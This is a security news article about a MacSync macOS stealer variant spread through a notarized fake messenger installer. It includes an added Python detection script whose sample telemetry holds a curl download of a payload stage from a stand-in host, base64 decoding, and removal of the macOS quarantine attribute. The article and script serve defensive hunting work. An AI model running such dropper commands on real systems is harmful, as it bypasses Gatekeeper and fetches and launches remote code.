Cybersecurity researchers have identified a new and more deceptive variant of the macOS information stealer known as MacSync, highlighting how threat actors continue to abuse trusted Apple mechanisms to distribute malware. The newly observed sample is delivered through a digitally signed and notarized Swift application that masquerades as the installer for a legitimate messaging app, allowing it to pass Apple's built-in checks such as Gatekeeper. Notarization is an automated malware scan of the submitted binary rather than a manual review, so a notarized app is not evidence that Apple inspected its behaviour. The discovery was made by Jamf, an Apple device management and security company, which noted that this approach marks a shift from earlier MacSync campaigns that relied on more overt user-interaction techniques.
According to Jamf researcher Thijs Xhaflaire, the latest MacSync variant abandons drag-to-terminal and ClickFix-style social engineering in favour of a quieter and more automated infection chain. The malware is distributed within a disk image named zk-call-messenger-installer-3.9.2-lts.dmg, hosted at zkcall[.]net/download. Because the application is code-signed and notarized, macOS lets it run without a Gatekeeper warning or an XProtect block. Despite this, the installer still displays instructions telling users to right-click the app and open it manually, the workflow normally used to bypass Gatekeeper for unsigned software and a tactic commonly associated with attempts to sidestep security protections. Apple has since revoked the abused code-signing certificate after the activity was reported, which causes Gatekeeper to reject the application on subsequent launches.
Once executed, the Swift-based installer functions as a dropper and performs a series of environmental checks before retrieving the next-stage payload. These include confirming active internet connectivity, enforcing a minimum execution delay of approximately one hour to limit repeated runs, and stripping the quarantine attribute (com.apple.quarantine) from downloaded components so that Gatekeeper does not assess them when they are launched. The malware also validates files before execution, indicating an emphasis on stability and stealth. Researchers observed notable changes in how the payload is downloaded, including modifications to the curl command syntax: instead of the combined flags seen in previous variants, the malware splits options into separate parameters and introduces additional flags such as --noproxy. Jamf noted that these adjustments, along with dynamically generated variables, suggest a deliberate attempt to evade detections keyed on the earlier command line or to improve delivery reliability.
Another evasion tactic involves inflating the disk image to more than 25 MB by embedding unrelated PDF documents. This unusual packaging may be intended to reduce suspicion or to evade automated scanning tools that only process smaller installer files. The downloaded payload is Base64-encoded and, once decoded, is confirmed to be MacSync, which is believed to be a rebranded evolution of the Mac.c malware first documented in April 2025. Research from MacPaw's Moonlock Lab indicates that MacSync includes a Go-based agent with capabilities beyond basic data theft. In addition to harvesting sensitive information, the malware supports remote command-and-control functions, enabling attackers to issue instructions and maintain long-term access to compromised systems.
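The dropper behaviour described in the two paragraphs above (a curl download with split options and --noproxy, Base64 decoding of the fetched stage, and removal of the quarantine attribute) can be hunted for in process-execution telemetry. The following Python is an added example written for this article, not Jamf's or Moonlock Lab's tooling; the event record, the sample command lines, the paths and the hostnames are constructed for illustration and are not indicators captured from the campaign.

```python
"""Hunt for a MacSync-style dropper chain in macOS process-execution telemetry.

Added example for this article, not Jamf's or Moonlock Lab's tooling. The event
format, the ProcEvent record and every command line below are constructed for
illustration; they are not indicators captured from the campaign.
"""
import os
import shlex
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str


def curl_flags(argv):
    """Normalise curl options: '-sL' and '-s -L' yield the same set, so a
    dropper that splits options into separate parameters does not look
    different from one that combines them. Option values are skipped."""
    flags = set()
    for tok in argv[1:]:
        if tok.startswith("--"):
            flags.add(tok)
        elif tok.startswith("-") and len(tok) > 1:
            flags.update("-" + ch for ch in tok[1:])
    return flags


def classify(argv):
    """Map one command line to a dropper stage, or None if it is unremarkable."""
    if not argv:
        return None
    name = os.path.basename(argv[0])
    if name == "curl" and "--noproxy" in curl_flags(argv):
        # --noproxy is rare in interactive use; the article reports it as a
        # flag newly introduced in this variant's download command.
        return "download"
    if name == "base64" and {"-D", "-d", "--decode"} & set(argv[1:]):
        # macOS base64 decodes with -D, GNU coreutils with -d/--decode.
        return "decode"
    if name == "xattr" and ("-c" in argv or ("-d" in argv and "com.apple.quarantine" in argv)):
        # Clearing or deleting the quarantine attribute stops Gatekeeper from
        # assessing the downloaded stage when it is executed.
        return "dequarantine"
    return None


def find_dropper_chains(events, min_stages=2):
    """Group classified children by parent pid; a parent whose children perform
    at least min_stages of the three stages is reported with the stages seen."""
    stages = {}
    for ev in events:
        tag = classify(shlex.split(ev.cmdline))
        if tag:
            stages.setdefault(ev.ppid, set()).add(tag)
    return {ppid: sorted(s) for ppid, s in stages.items() if len(s) >= min_stages}


# Constructed sample telemetry (hypothetical paths and hosts): pid 500 is the
# installer, 501-503 are its children; pid 600 is an unrelated benign curl.
SAMPLE_EVENTS = [
    ProcEvent(500, 1, "/Volumes/Installer/Installer.app/Contents/MacOS/Installer"),
    ProcEvent(501, 500, "/usr/bin/curl --noproxy '*' -s -L -o /tmp/.stage.b64 https://stage.example.invalid/p"),
    ProcEvent(502, 500, "/usr/bin/base64 -D -i /tmp/.stage.b64 -o /tmp/.stage"),
    ProcEvent(503, 500, "/usr/bin/xattr -d com.apple.quarantine /tmp/.stage"),
    ProcEvent(600, 1, "/usr/bin/curl -sL -o /Users/alice/Downloads/notes.pdf https://docs.example.invalid/notes.pdf"),
]


if __name__ == "__main__":
    for ppid, seen in find_dropper_chains(SAMPLE_EVENTS).items():
        print(f"dropper-like parent pid {ppid}: stages {', '.join(seen)}")
```

The flag normalisation in curl_flags is the point of the example: a rule that matches the literal string "-sL" is defeated by "-s -L", whereas comparing the set of options is not. Correlating by parent pid rather than matching each command in isolation keeps the benign curl at pid 600 out of the result; on real endpoint telemetry the same grouping works on whatever parent identifier the sensor records.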
Security researchers note that this campaign reflects a broader trend within the macOS malware ecosystem. Threat actors are increasingly attempting to distribute malicious software through signed and notarized applications to make them appear legitimate and trustworthy to both users and operating system defenses. Similar tactics have been observed in previous campaigns involving fake Google Meet installers used to spread other macOS stealers such as Odyssey. At the same time, attackers continue to mix approaches, with unsigned disk images still being used in recent campaigns delivering malware like DigitStealer. Jamf cautioned that as long as attackers can obtain or abuse valid signing credentials, macOS users may continue to face threats that blend seamlessly into otherwise normal application workflows.